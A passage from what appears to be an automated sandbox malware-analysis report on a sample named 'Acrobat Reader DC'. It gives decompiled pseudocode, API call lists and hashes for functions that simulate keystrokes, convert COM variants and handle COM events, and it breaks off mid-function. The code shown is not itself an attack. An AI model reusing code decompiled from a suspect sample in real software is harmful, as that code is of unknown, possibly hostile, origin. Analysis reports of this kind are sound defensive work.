                                  • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 81%
                                  			E00445E52(struct HWND__** _a4, intOrPtr _a8) {
                                  				struct HWND__** _t27;
                                  
                                  				_t27 = _a4;
                                  				E00445AA7( *_t27, 1);
                                  				_push(MapVirtualKeyW(0x25, 0) << 0x00000010 | 0x00000001);
                                  				if(_a8 >= 0) {
                                  					PostMessageW( *_t27, 0x100, 0x27, ??);
                                  					Sleep(0);
                                  					PostMessageW( *_t27, 0x101, 0x27, MapVirtualKeyW(0x25, 0) << 0x00000010 | 0xc0000001);
                                  				} else {
                                  					PostMessageW( *_t27, 0x100, 0x25, ??);
                                  					Sleep(0);
                                  					PostMessageW( *_t27, 0x101, 0x25, MapVirtualKeyW(0x25, 0) << 0x00000010 | 0xc0000001);
                                  				}
                                  				Sleep(0);
                                  				E00445AA7( *_t27, 0);
                                  				return 1;
                                  			}





                                  APIs
                                    • Part of subcall function 00445AA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00445AC7
                                    • Part of subcall function 00445AA7: GetCurrentThreadId.KERNEL32 ref: 00445ACE
                                    • Part of subcall function 00445AA7: AttachThreadInput.USER32(00000000), ref: 00445AD5
                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445E6F
                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445E88
                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445E96
                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445E9C
                                  • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445EBD
                                  • Sleep.KERNEL32(00000000), ref: 00445ECB
                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445ED1
                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445EE6
                                  • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445EEE
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                  • String ID:
                                  • API String ID: 2014098862-0
                                  • Opcode ID: 5ca03ddf5c5627d7609a553b695717aade5f72ce3845e2189486292beca2fa90
                                  • Instruction ID: 3cb45b36699f005c3339592b7719367c9fd6f04972b18b3a4454280c1561912d
                                  • Opcode Fuzzy Hash: 5ca03ddf5c5627d7609a553b695717aade5f72ce3845e2189486292beca2fa90
                                  • Instruction Fuzzy Hash: 44115671390300BBF6209B959D8AF5A775DEB98B11F20490DFB80AB1C1C5F5A4418B7C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ClearVariant
                                  • String ID:
                                  • API String ID: 1473721057-0
                                  • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                  • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                  • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                  • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 56%
                                  			E0045EA0F(intOrPtr* _a4, signed int _a8) {
                                  				signed int _v8;
                                  				signed short _v12;
                                  				signed short _v20;
                                  				signed int _v24;
                                  				signed int _v26;
                                  				signed int _v28;
                                  				signed int _v30;
                                  				signed short _v34;
                                  				signed int _v36;
                                  				signed int _v40;
                                  				signed short _v44;
                                  				signed int _v48;
                                  				signed int _v52;
                                  				char _v84;
                                  				signed int _t104;
                                  				signed int _t105;
                                  				intOrPtr* _t120;
                                  				intOrPtr _t129;
                                  				signed short* _t130;
                                  				signed int _t131;
                                  				void* _t137;
                                  
                                  				_t120 = _a4;
                                  				_t130 = _a8;
                                  				_t104 =  *_t130 & 0x0000ffff;
                                  				_t137 = _t104 - 0x4002;
                                  				if(_t137 > 0) {
                                  					_t105 = _t104 - 0x4003;
                                  					if(_t105 > 0x12) {
                                  						goto L55;
                                  					} else {
                                  						switch( *((intOrPtr*)(_t105 * 4 +  &M0045EEBB))) {
                                  							case 0:
                                  								__esi =  *(__esi + 8);
                                  								__eflags = __esi;
                                  								if(__esi != 0) {
                                  									__edi =  *__esi;
                                  									goto L8;
                                  								}
                                  								goto L9;
                                  							case 1:
                                  								__esi =  *(__esi + 8);
                                  								__eflags = __esi;
                                  								if(__esi == 0) {
                                  									goto L9;
                                  								} else {
                                  									__fp0 =  *__esi;
                                  									__esi = __ebx;
                                  									_v12 = __fp0;
                                  									__eax = E00408F40(__edi, __ebx);
                                  									__fp0 = _v12;
                                  									 *((intOrPtr*)(__ebx + 8)) = 3;
                                  									 *__ebx = _v12;
                                  									return __eax;
                                  								}
                                  								goto L56;
                                  							case 2:
                                  								__esi =  *(__esi + 8);
                                  								__eflags = __esi;
                                  								if(__esi == 0) {
                                  									goto L9;
                                  								} else {
                                  									__fp0 =  *__esi;
                                  									__esi = __ebx;
                                  									_v12 = __fp0;
                                  									__eax = E00408F40(__edi, __ebx);
                                  									__fp0 = _v12;
                                  									 *((intOrPtr*)(__ebx + 8)) = 3;
                                  									 *__ebx = _v12;
                                  									return __eax;
                                  								}
                                  								goto L56;
                                  							case 3:
                                  								goto L55;
                                  							case 4:
                                  								goto L20;
                                  							case 5:
                                  								__eflags = _t130[4];
                                  								if(__eflags != 0) {
                                  									_push(0x10);
                                  									 *((intOrPtr*)(_t120 + 8)) = 8;
                                  									_t108 = E004115D7(_t128, _t130, __eflags);
                                  									_push(_t108);
                                  									 *_t120 = _t108;
                                  									__imp__#8();
                                  									 *((short*)( *_t120)) = 9;
                                  									 *((intOrPtr*)( *_t120 + 8)) =  *(_t130[4]);
                                  									_t111 =  *((intOrPtr*)( *_t120 + 8));
                                  									_push(_t111);
                                  									 *((intOrPtr*)( *((intOrPtr*)( *_t111 + 4))))();
                                  								}
                                  								return 1;
                                  								goto L56;
                                  							case 6:
                                  								__esi =  *(__esi + 8);
                                  								__eflags = __esi;
                                  								if(__esi == 0) {
                                  									goto L9;
                                  								} else {
                                  									__eflags =  *__esi;
                                  									_t100 =  *__esi != 0;
                                  									__eflags = _t100;
                                  									__edx = __edx & 0xffffff00 | _t100;
                                  									_a8 = __dl;
                                  									__eax = _a8;
                                  									return E004530C9(__ebx, _a8);
                                  								}
                                  								goto L56;
                                  							case 7:
                                  								__esi =  *(__esi + 8);
                                  								__eflags = __esi;
                                  								if(__esi == 0) {
                                  									goto L9;
                                  								} else {
                                  									__ecx = __ebx;
                                  									return E00468070(__ebx, __esi);
                                  								}
                                  								goto L56;
                                  							case 8:
                                  								__esi =  *(__esi + 8);
                                  								__eflags = __esi;
                                  								if(__esi != 0) {
                                  									__edi =  *__esi;
                                  									goto L8;
                                  								}
                                  								goto L9;
                                  							case 9:
                                  								__esi =  *(__esi + 8);
                                  								__eflags = __esi;
                                  								if(__esi != 0) {
                                  									__edi =  *__esi & 0x000000ff;
                                  									goto L8;
                                  								}
                                  								goto L9;
                                  							case 0xa:
                                  								__esi =  *(__esi + 8);
                                  								__eflags = __esi;
                                  								if(__esi != 0) {
                                  									__edi =  *__esi & 0x0000ffff;
                                  									goto L8;
                                  								}
                                  								goto L9;
                                  							case 0xb:
                                  								__esi =  *(__esi + 8);
                                  								__eflags = __esi;
                                  								if(__esi == 0) {
                                  									goto L9;
                                  								} else {
                                  									__ecx =  *(__esi + 4);
                                  									__edi =  *__esi;
                                  									__esi = __ebx;
                                  									_v8 = __ecx;
                                  									__eax = E00408F40(__edi, __ebx);
                                  									__edx = _v8;
                                  									 *((intOrPtr*)(__ebx + 8)) = 2;
                                  									 *(__ebx + 4) = _v8;
                                  									 *__ebx = __edi;
                                  									return __eax;
                                  								}
                                  								goto L56;
                                  							case 0xc:
                                  								__esi =  *(__esi + 8);
                                  								__eflags = __esi;
                                  								if(__esi == 0) {
                                  									goto L9;
                                  								} else {
                                  									__edi =  *__esi;
                                  									__eax =  *(__esi + 4);
                                  									goto L15;
                                  								}
                                  								goto L56;
                                  						}
                                  					}
                                  				} else {
                                  					if(_t137 == 0) {
                                  						_t131 = _t130[4];
                                  						if(_t131 != 0) {
                                  							_t129 =  *_t131;
                                  							goto L8;
                                  						}
                                  						goto L9;
                                  					} else {
                                  						if(_t104 > 0x15) {
                                  							L55:
                                  							return 0;
                                  						} else {
                                  							switch( *((intOrPtr*)(_t104 * 4 +  &M0045EE63))) {
                                  								case 0:
                                  									__eax = 0x484ea8;
                                  									return E0040E710(0x484ea8, __ebx, __ecx);
                                  									goto L56;
                                  								case 1:
                                  									__edi =  *(__esi + 8);
                                  									goto L8;
                                  								case 2:
                                  									__edi =  *(__esi + 8);
                                  									goto L8;
                                  								case 3:
                                  									__fp0 =  *(__esi + 8);
                                  									__esi = __ebx;
                                  									_v12 = __fp0;
                                  									__eax = E00408F40(__edi, __ebx);
                                  									__fp0 = _v12;
                                  									 *((intOrPtr*)(__ebx + 8)) = 3;
                                  									 *__ebx = _v12;
                                  									return __eax;
                                  									goto L56;
                                  								case 4:
                                  									__fp0 =  *(__esi + 8);
                                  									__esi = __ebx;
                                  									_v12 = __fp0;
                                  									__eax = E00408F40(__edi, __ebx);
                                  									__fp0 = _v12;
                                  									 *((intOrPtr*)(__ebx + 8)) = 3;
                                  									 *__ebx = _v12;
                                  									return __eax;
                                  									goto L56;
                                  								case 5:
                                  									asm("fild qword [esi+0x8]");
                                  									__esi = __ebx;
                                  									_v12 = __fp0;
                                  									__eax = E00408F40(__edi, __ebx);
                                  									__fp0 = _v12;
                                  									 *__ebx = _v12;
                                  									 *((intOrPtr*)(__ebx + 8)) = 3;
                                  									return __eax;
                                  									goto L56;
                                  								case 6:
                                  									__fp0 =  *(__esi + 8);
                                  									__eax =  &_v36;
                                  									_push( &_v36);
                                  									__esp = __esp - 8;
                                  									 *__esp =  *(__esi + 8);
                                  									__imp__#185();
                                  									__ecx = _v24 & 0x0000ffff;
                                  									__edx = _v26 & 0x0000ffff;
                                  									__eax = _v28 & 0x0000ffff;
                                  									_push(_v24 & 0x0000ffff);
                                  									__ecx = _v30 & 0x0000ffff;
                                  									_push(_v26 & 0x0000ffff);
                                  									__edx = _v34 & 0x0000ffff;
                                  									_push(_v28 & 0x0000ffff);
                                  									__eax = _v36 & 0x0000ffff;
                                  									_push(_v30 & 0x0000ffff);
                                  									_push(__edx);
                                  									__ecx =  &_v84;
                                  									__eax = E0041329B(__edx,  &_v84, L"%4d%02d%02d%02d%02d%02d", _v36 & 0x0000ffff);
                                  									__eax =  &_v84;
                                  									return E0040E710( &_v84, __ebx, __ecx);
                                  									goto L56;
                                  								case 7:
                                  									L20:
                                  									__eflags =  *(__esi + 8);
                                  									if(__eflags == 0) {
                                  										goto L9;
                                  									} else {
                                  										_push(0x10);
                                  										__eax = E004115D7(__edi, __esi, __eflags);
                                  										__esp =  &(__esp[2]);
                                  										__eflags = __eax;
                                  										if(__eflags == 0) {
                                  											__eax = 0;
                                  											__eflags = 0;
                                  											 *(__ebx + 0xc) = 0;
                                  											 *((intOrPtr*)(__ebx + 8)) = 4;
                                  											return 0;
                                  										} else {
                                  											__edi =  *(__esi + 8);
                                  											__esi = __eax;
                                  											__eax = E00401B10(__edi, __eax, __eflags);
                                  											 *(__ebx + 0xc) = __eax;
                                  											 *((intOrPtr*)(__ebx + 8)) = 4;
                                  											return __eax;
                                  										}
                                  									}
                                  									goto L56;
                                  								case 8:
                                  									_push(0x10);
                                  									 *((intOrPtr*)(_t120 + 8)) = 8;
                                  									_t116 = E004115D7(_t128, _t130, _t138);
                                  									_push(_t116);
                                  									 *_t120 = _t116;
                                  									__imp__#8();
                                  									_t117 =  *_t120;
                                  									_push(_t130);
                                  									_push(_t117);
                                  									__imp__#10();
                                  									if(_t117 < 0) {
                                  										_push( *_t120);
                                  										__imp__#9();
                                  										_push( *_t120);
                                  										E004111DC();
                                  										 *_t120 = 0;
                                  									}
                                  									return 1;
                                  									goto L56;
                                  								case 9:
                                  									goto L55;
                                  								case 0xa:
                                  									__eflags =  *(__esi + 8);
                                  									_t43 =  *(__esi + 8) != 0;
                                  									__eflags = _t43;
                                  									__ecx = __ecx & 0xffffff00 | _t43;
                                  									_a8 = __cl;
                                  									__edx = _a8;
                                  									return E004530C9(__ebx, _a8);
                                  									goto L56;
                                  								case 0xb:
                                  									__eax =  *(__esi + 4);
                                  									__ecx =  *(__esi + 8);
                                  									__edx =  *__esi;
                                  									_v48 =  *(__esi + 4);
                                  									__eax =  &_v20;
                                  									_v44 =  *(__esi + 8);
                                  									_v52 =  *__esi;
                                  									__edx =  *(__esi + 0xc);
                                  									_push( &_v20);
                                  									__ecx =  &_v52;
                                  									_push( &_v52);
                                  									_v40 =  *(__esi + 0xc);
                                  									__imp__#220();
                                  									__fp0 = _v20;
                                  									__esi = __ebx;
                                  									_v12 = _v20;
                                  									__eax = E00408F40(__edi, __ebx);
                                  									__fp0 = _v12;
                                  									 *__ebx = _v12;
                                  									 *((intOrPtr*)(__ebx + 8)) = 3;
                                  									return __eax;
                                  									goto L56;
                                  								case 0xc:
                                  									__edi =  *(__esi + 8);
                                  									goto L8;
                                  								case 0xd:
                                  									__edi =  *(__esi + 8) & 0x000000ff;
                                  									goto L8;
                                  								case 0xe:
                                  									__edi =  *(__esi + 8) & 0x0000ffff;
                                  									L8:
                                  									E00408F40(_t129, _t120);
                                  									 *((intOrPtr*)(_t120 + 8)) = 1;
                                  									 *_t120 = _t129;
                                  									L9:
                                  									return 1;
                                  									goto L56;
                                  								case 0xf:
                                  									__edi =  *(__esi + 8);
                                  									__eax =  *(__esi + 0xc);
                                  									L15:
                                  									__esi = __ebx;
                                  									_v8 = __eax;
                                  									__eax = E00408F40(__edi, __ebx);
                                  									__ecx = _v8;
                                  									 *((intOrPtr*)(__ebx + 8)) = 2;
                                  									 *(__ebx + 4) = _v8;
                                  									 *__ebx = __edi;
                                  									return __eax;
                                  									goto L56;
                                  								case 0x10:
                                  									__edx =  *(__esi + 0xc);
                                  									__edi =  *(__esi + 8);
                                  									__esi = __ebx;
                                  									_v8 = __edx;
                                  									__eax = E00408F40(__edi, __ebx);
                                  									__eax = _v8;
                                  									 *(__ebx + 4) = __eax;
                                  									 *((intOrPtr*)(__ebx + 8)) = 2;
                                  									 *__ebx = __edi;
                                  									return __eax;
                                  									goto L56;
                                  							}
                                  						}
                                  					}
                                  				}
                                  				L56:
                                  			}

























                                  APIs
                                  • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                  • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                  • VariantClear.OLEAUT32 ref: 0045EA6D
                                  • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                  • __swprintf.LIBCMT ref: 0045EC33
                                  • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                  Strings
                                  • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                  • String ID: %4d%02d%02d%02d%02d%02d
                                  • API String ID: 2441338619-1568723262
                                  • Opcode ID: 707bb89b8c24df81e4b6e45c7c0240a94ced01312171e31af911b1112949458a
                                  • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                  • Opcode Fuzzy Hash: 707bb89b8c24df81e4b6e45c7c0240a94ced01312171e31af911b1112949458a
                                  • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E004091B0(void* __edx, void* __fp0, char _a4) {
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				signed int _v20;
                                  				char _v24;
                                  				signed int* _v28;
                                  				char _v32;
                                  				signed int _v36;
                                  				char _v40;
                                  				short _v42;
                                  				short _v44;
                                  				char _v52;
                                  				char _v60;
                                  				signed int _v64;
                                  				char _v72;
                                  				char _v76;
                                  				char _v80;
                                  				signed int* _v84;
                                  				char _v88;
                                  				intOrPtr _v92;
                                  				intOrPtr _v96;
                                  				intOrPtr _v100;
                                  				char _v104;
                                  				char _v120;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				long _t133;
                                  				signed int _t134;
                                  				signed int _t141;
                                  				intOrPtr _t163;
                                  				signed int _t180;
                                  				signed int _t181;
                                  				intOrPtr _t185;
                                  				void* _t186;
                                  				intOrPtr _t188;
                                  				signed int _t203;
                                  				intOrPtr* _t204;
                                  				intOrPtr _t209;
                                  				char _t217;
                                  				void* _t218;
                                  				intOrPtr _t235;
                                  				signed int _t239;
                                  				void* _t243;
                                  				signed int _t247;
                                  				signed int _t250;
                                  				intOrPtr _t257;
                                  				signed int _t258;
                                  				signed int _t264;
                                  				signed int _t270;
                                  				char _t271;
                                  				signed int _t273;
                                  				intOrPtr _t274;
                                  				intOrPtr _t283;
                                  				void* _t287;
                                  
                                  				_t287 = __fp0;
                                  				_t243 = __edx;
                                  				if( *0x4a7f18 != 0) {
                                  					_t271 = _a4;
                                  					__eflags =  *((char*)(_t271 + 0x480)) - 1;
                                  					if(__eflags == 0) {
                                  						goto L1;
                                  					}
                                  					_t219 =  &_v120;
                                  					_v24 = 0;
                                  					_v88 = 0x488088;
                                  					_v84 = 0;
                                  					_v80 = 0;
                                  					_v76 = 0;
                                  					_v72 = 0;
                                  					_v64 = 1;
                                  					_v60 = 0;
                                  					E0040BC70( &_v120, __eflags);
                                  					InterlockedIncrement(0x4a7f04);
                                  					_t133 =  *0x4a7f04; // 0x0
                                  					__eflags = _t133 - 1;
                                  					if(_t133 == 1) {
                                  						L8:
                                  						_t134 =  *0x4a7f0c; // 0x0
                                  						__eflags =  *0x4a7f08 - _t134; // 0x0
                                  						if(__eflags == 0) {
                                  							L12:
                                  							InterlockedDecrement(0x4a7f04);
                                  							E00402250( &_v120);
                                  							E00408F40(_t262,  &_v72);
                                  							E00410C60( &_v88, _t262);
                                  							goto L1;
                                  						}
                                  						_t12 = ((_t134 & 0x0000003f) << 4) + 0x4a9138; // 0x4a9138
                                  						_t262 = _t12;
                                  						_t141 = E00431DC9(_t262);
                                  						__eflags = _t141;
                                  						if(_t141 != 0) {
                                  							goto L12;
                                  						}
                                  						_t13 = _t262 + 4; // 0x0
                                  						_v36 = _t262;
                                  						E00408E80( &_v72, _t219,  *((intOrPtr*)( *_t13)));
                                  						_t16 = _t262 + 4; // 0x0
                                  						_t216 = E0045340C( *((intOrPtr*)( *_t16 + 4)));
                                  						E00402160( &_v120, _t146, _t243, _t262);
                                  						_t19 = _t262 + 4; // 0x0
                                  						_t262 = E0045340C( *((intOrPtr*)( *_t19 + 8)));
                                  						E0040D200( &_v120,  *_t16, _t150, _t287);
                                  						__eflags = E00465124(_v120,  &_v20, __eflags, _t271, _v120,  &_v32,  &_v20,  &_v28,  &_v40);
                                  						if(__eflags != 0) {
                                  							 *((char*)(_t271 + 0x480)) = 1;
                                  							_t273 =  &_v104;
                                  							E00401B10(L"@COM_EVENTOBJ", _t273, __eflags);
                                  							E00401980(2, 1, E00432508( &_v72), _t273);
                                  							_t226 = _t273;
                                  							E00402250(_t273);
                                  							_t163 = E0040F410(_v32);
                                  							__eflags = _v20;
                                  							_t274 = _t163;
                                  							_v16 = _t274;
                                  							if(_v20 <= 0) {
                                  								L25:
                                  								_t247 =  *0x4a7f0c; // 0x0
                                  								_t250 = ((_t247 & 0x0000003f) << 4) + 0x4a9138;
                                  								E0046FE32(_t250);
                                  								_t264 = 1;
                                  								 *0x4a7f0c =  *0x4a7f0c + 1;
                                  								InterlockedDecrement(0x4a7f04);
                                  								E0046FF07(_t216, 1, _v32);
                                  								__eflags = _v20 - 1;
                                  								if(_v20 < 1) {
                                  									L48:
                                  									_t217 = _a4;
                                  									E0047D33E(_t226, _t250, _t287, _t217, _v32 + 1, 0, 0);
                                  									E0046FEB1(0x4a7f34);
                                  									_t265 = L"@COM_EVENTOBJ";
                                  									E00401B10(L"@COM_EVENTOBJ",  &_v104, __eflags);
                                  									E0040C2C0(2,  &_v104,  &_a4,  &_v24);
                                  									E00402250( &_v104);
                                  									__eflags =  *0x4a7f18;
                                  									if( *0x4a7f18 == 0) {
                                  										L29:
                                  										 *((char*)(_t217 + 0x480)) = 0;
                                  										L30:
                                  										E00402250( &_v120);
                                  										E00408F40(_t265,  &_v72);
                                  										E00410C60( &_v88, _t265);
                                  										return 1;
                                  									}
                                  									_t180 = E00432416(_a4);
                                  									__eflags = _t180;
                                  									if(_t180 != 0) {
                                  										goto L29;
                                  									}
                                  									_t181 =  *0x4a7f1c; // 0x0
                                  									__eflags = _t181;
                                  									if(_t181 == 0) {
                                  										goto L29;
                                  									}
                                  									 *((char*)(_t181 + 0x40)) = 0;
                                  									goto L29;
                                  								}
                                  								_t62 = _t264 + 0xb; // 0xc
                                  								_t218 = _t62;
                                  								_v12 = 0x18;
                                  								_v28 = _v84;
                                  								while(1) {
                                  									_v36 = _t264;
                                  									__eflags = _t264 - _v24;
                                  									if(_t264 <= _v24) {
                                  										goto L40;
                                  									}
                                  									_v40 = 0;
                                  									_v42 = 0;
                                  									_t188 =  *((intOrPtr*)(_t274 + 4));
                                  									_v104 = 0x485a84;
                                  									_v100 = 0;
                                  									_v96 = 0;
                                  									_v92 = 0;
                                  									_t235 =  *((intOrPtr*)(_t218 + _t188 + 4));
                                  									__eflags =  *((short*)(_t235 + 8)) - 0x41;
                                  									_v44 = _t250 | 0xffffffff;
                                  									if( *((short*)(_t235 + 8)) != 0x41) {
                                  										E00408F40(_t264,  &_v72);
                                  										_v64 = 1;
                                  										_v72 = 0;
                                  										L39:
                                  										_t250 =  &_v72;
                                  										E00401980(1, 0, _t250,  *((intOrPtr*)( *((intOrPtr*)(_t218 +  *((intOrPtr*)(_v16 + 4)))))));
                                  										E0044B469(__eflags,  &_v52);
                                  										E0040EDC0( &_v104, _t264,  *((intOrPtr*)( *((intOrPtr*)(_t218 +  *((intOrPtr*)(_v16 + 4)))))));
                                  										L41:
                                  										_t185 =  *((intOrPtr*)(_v16 + 4));
                                  										_t226 =  *(_t218 + _t185 + 4);
                                  										__eflags =  *((short*)(_t226 + 8)) - 0x41;
                                  										if( *((short*)(_t226 + 8)) != 0x41) {
                                  											_t186 = 8;
                                  											L47:
                                  											_v12 = _v12 + _t186;
                                  											_t264 = _t264 + 1;
                                  											_t218 = _t218 + _t186;
                                  											__eflags = _t264 - _v20;
                                  											if(_t264 <= _v20) {
                                  												_t71 =  &_v28;
                                  												 *_t71 =  &(_v28[1]);
                                  												__eflags =  *_t71;
                                  												_t274 = _v16;
                                  												continue;
                                  											}
                                  											goto L48;
                                  										}
                                  										_t250 =  *(_t218 + _t185 + 8);
                                  										_t203 =  *(_t250 + 8) & 0x0000ffff;
                                  										__eflags = _t203 - 0x4a;
                                  										if(_t203 == 0x4a) {
                                  											L45:
                                  											_t186 = 0x14;
                                  											goto L47;
                                  										}
                                  										__eflags = _t203 - 0x49;
                                  										if(_t203 == 0x49) {
                                  											goto L45;
                                  										}
                                  										_t186 = 0x10;
                                  										goto L47;
                                  									}
                                  									_t195 =  *((intOrPtr*)(_t218 + _t188 + 8));
                                  									_t239 =  *( *((intOrPtr*)(_t218 + _t188 + 8)) + 8) & 0x0000ffff;
                                  									__eflags = _t239 - 0x4a;
                                  									if(_t239 == 0x4a) {
                                  										L36:
                                  										E00402780(_t195, _t239,  &_v104);
                                  										_t195 =  *((intOrPtr*)(_v12 +  *((intOrPtr*)(_t274 + 4))));
                                  										L37:
                                  										E00402780(_t195, _t239,  &_v104);
                                  										E00402710(0x7f,  &_v52, _t287);
                                  										E00402780( &_v52, _t239,  &_v104);
                                  										E0040A780(_a4, _t287,  &_v104,  &_v40,  &_v72, 0xffffffff);
                                  										_t264 = _v36;
                                  										goto L39;
                                  									}
                                  									__eflags = _t239 - 0x49;
                                  									if(_t239 != 0x49) {
                                  										goto L37;
                                  									}
                                  									goto L36;
                                  									L40:
                                  									_t250 =  *_v28;
                                  									__eflags = 0;
                                  									E00401980(1, 0, _t250,  *((intOrPtr*)( *((intOrPtr*)(_t218 +  *((intOrPtr*)(_t274 + 4)))))));
                                  									goto L41;
                                  								}
                                  							}
                                  							_t216 = 3;
                                  							_t265 = 3;
                                  							while(1) {
                                  								_t226 = _v36;
                                  								__eflags = _t216 -  *((intOrPtr*)(_t226 + 8));
                                  								if(_t216 >=  *((intOrPtr*)(_t226 + 8))) {
                                  									goto L25;
                                  								}
                                  								_t283 =  *((intOrPtr*)(_t274 + 4));
                                  								_t204 =  *((intOrPtr*)(_t283 + _t265 * 4));
                                  								__eflags =  *((short*)(_t204 + 8));
                                  								if( *((short*)(_t204 + 8)) != 0) {
                                  									L22:
                                  									_t257 =  *((intOrPtr*)(_t283 + 4 + _t265 * 4));
                                  									_t270 = _t265 + 1;
                                  									__eflags =  *((short*)(_t257 + 8)) - 0x41;
                                  									if( *((short*)(_t257 + 8)) == 0x41) {
                                  										_t270 = _t270 + 2;
                                  										__eflags = _t270;
                                  									}
                                  									E0040BA10(_t216, _t226, _t270,  &_v88,  *((intOrPtr*)( *((intOrPtr*)(_t226 + 4)) + _t216 * 4)));
                                  									_t274 = _v16;
                                  									_t209 = _v24 + 1;
                                  									_v24 = _t209;
                                  									__eflags = _t209 - _v20;
                                  									if(_t209 < _v20) {
                                  										_t216 = _t216 + 1;
                                  										_t265 = _t270 + 1;
                                  										__eflags = _t265;
                                  										continue;
                                  									}
                                  									goto L25;
                                  								} else {
                                  									goto L20;
                                  								}
                                  								while(1) {
                                  									L20:
                                  									__eflags =  *_t204 - 0x1e;
                                  									if( *_t204 != 0x1e) {
                                  										break;
                                  									}
                                  									_t204 =  *((intOrPtr*)(_t283 + 4 + _t265 * 4));
                                  									_t265 = _t265 + 1;
                                  									__eflags =  *((short*)(_t204 + 8));
                                  									if( *((short*)(_t204 + 8)) == 0) {
                                  										continue;
                                  									}
                                  									goto L22;
                                  								}
                                  								E0045E737(_t287, _a4, 0x91, 0xffffffff);
                                  								goto L30;
                                  							}
                                  							goto L25;
                                  						}
                                  						_t258 =  *0x4a7f0c; // 0x0
                                  						E0046FE32(((_t258 & 0x0000003f) << 4) + 0x4a9138);
                                  						 *0x4a7f0c =  *0x4a7f0c + 1;
                                  						__eflags =  *0x4a7f0c;
                                  						goto L12;
                                  					}
                                  					_t262 = 2;
                                  					while(1) {
                                  						__eflags = _t262;
                                  						if(_t262 == 0) {
                                  							break;
                                  						}
                                  						InterlockedDecrement(0x4a7f04);
                                  						Sleep(0xa);
